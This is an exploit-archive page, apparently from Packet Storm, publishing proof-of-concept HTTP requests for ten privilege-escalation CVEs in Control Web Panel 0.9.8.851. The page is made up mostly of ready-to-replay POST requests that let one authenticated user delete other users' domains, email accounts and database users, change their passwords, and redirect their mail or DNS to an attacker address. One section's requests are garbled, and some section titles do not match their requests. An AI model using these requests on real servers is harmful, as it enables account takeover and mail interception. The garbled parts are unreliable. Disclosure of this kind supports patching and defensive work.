what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Control Web Panel 0.9.8.851 Privilege Escalation

Control Web Panel 0.9.8.851 Privilege Escalation
Posted Sep 9, 2019
Authored by Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak

Control Web Panel version 0.9.8.851 suffers from multiple privilege escalation vulnerabilities.

tags | exploit, web, vulnerability
advisories | CVE-2019-14721, CVE-2019-14722, CVE-2019-14723, CVE-2019-14724, CVE-2019-14725, CVE-2019-14726, CVE-2019-14727, CVE-2019-14728, CVE-2019-14729, CVE-2019-14730
SHA-256 | e6ce381103bbd4b17c04a857140df6e826e521130a7f2572cbafc0f30e42b80c

Control Web Panel 0.9.8.851 Privilege Escalation

Change Mirror Download
CVE Number      : CVE-2019-14721, CVE-2019-14722, CVE-2019-14723, CVE-2019-14724, CVE-2019-14725, CVE-2019-14726, CVE-2019-14727, CVE-2019-14728, CVE-2019-14729, CVE-2019-14730

Date : 24 Jul 2019
Exploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage : https://control-webpanel.com/
Software Link : Not available, user panel only available for lastest version
Product Name : CWP (CentOS Control Web Panel)
Version : 0.9.8.851
Tested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
Reference : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE
Attack Requirement : Authenticated User

-------------------------------------------------------------------------------------------------------------
CVE-2019-14721 : CWP (CentOS Control Web Panel 0.9.8.851) Remove user from phpMyAdmin via an attacker account
-------------------------------------------------------------------------------------------------------------

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mysql_manager&acc=deleteuserdb HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 31
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_manager
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

user=<TARGET-USER>&host=localhost

-------------------------------------------------------------------------------------------------------------
CVE-2019-14722 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other mail forwarder
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=forwardelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 7
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>

-------------------------------------------------------------------------------------------------------------
CVE-2019-14723 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other email account
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=emaildelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 21
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>

-------------------------------------------------------------------------------------------------------------
CVE-2019-14724 : CWP (CentOS Control Web Panel 0.9.8.851) Access Other DNS and Delete
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=updateforwarders HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 14
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=bob2@bob2&goto=attacker@attacker.com

-------------------------------------------------------------------------------------------------------------
CVE-2019-14725 : CWP (CentOS Control Web Panel 0.9.8.851) Remove user from phpMyAdmin via an attacker account
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=updquotaemail HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 38
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>&quota=1048576000

-------------------------------------------------------------------------------------------------------------
CVE-2019-14726 : CWP (CentOS Control Web Panel 0.9.8.851) Modify forward mail destination on victim's account
-------------------------------------------------------------------------------------------------------------

# Access

POST cwp_b99b38b4d4ced310alicealiceindex.phpmodule=dns_zone_editor&acc=paserrecord HTTP1.1
Host 192.168.80.1482083
User-Agent Mozilla5.0 (Windows NT 10.0; Win64; x64; rv68.0) Gecko20100101 Firefox68.0
Accept
Accept-Language en-US,en;q=0.5
Accept-Encoding gzip, deflate
Content-Type applicationx-www-form-urlencoded; charset=UTF-8
csrftoken 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With XMLHttpRequest
Content-Length 16
Connection close
Referer https192.168.80.1482083cwp_b99b38b4d4ced310alicemodule=dns_zone_editor
Cookie PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=bob.com

-------------------------------------------------------------------------------

# Delete

POST cwp_b99b38b4d4ced310alicealiceindex.phpmodule=dns_zone_editor&acc=addregdns HTTP1.1
Host 192.168.80.1482083
User-Agent Mozilla5.0 (Windows NT 10.0; Win64; x64; rv68.0) Gecko20100101 Firefox68.0
Accept
Accept-Language en-US,en;q=0.5
Accept-Encoding gzip, deflate
Content-Type applicationx-www-form-urlencoded; charset=UTF-8
csrftoken 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With XMLHttpRequest
Content-Length 111
Connection close
Referer https192.168.80.1482083cwp_b99b38b4d4ced310alicemodule=dns_zone_editor
Cookie PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=bob.com&namereg=Attacker.com&valuereg=192.168.10.200&cachereg=14400&reg=A&flag=undefined&tag=undefined

-------------------------------------------------------------------------------------------------------------
CVE-2019-14727 : CWP (CentOS Control Web Panel 0.9.8.851) Change other email password
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=changpassemail HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 45
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>&pass1email=P@ssw0rd

-------------------------------------------------------------------------------------------------------------
CVE-2019-14728 : CWP (CentOS Control Web Panel 0.9.8.851) Add forward mail to other account
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=addforwar HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 73
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

forwaraddres=bob2&domainforwar=bob2&forwarders=attacker@attacker.com

-------------------------------------------------------------------------------------------------------------
CVE-2019-14729 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other sub-domain
-------------------------------------------------------------------------------------------------------------

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=subdomains&acc=subdomaindelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 32
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=subdomains
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=<TARGET-DOMAIN>&subdomain=<TARGET-SUBDOMAIN>

-------------------------------------------------------------------------------------------------------------
CVE-2019-14730 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other domain
-------------------------------------------------------------------------------------------------------------

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=domains&acc=verifsubdomain HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 12
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=domains
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=<TARGET-DOMAIN>
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    18 Files
  • 6
    Oct 6th
    16 Files
  • 7
    Oct 7th
    12 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close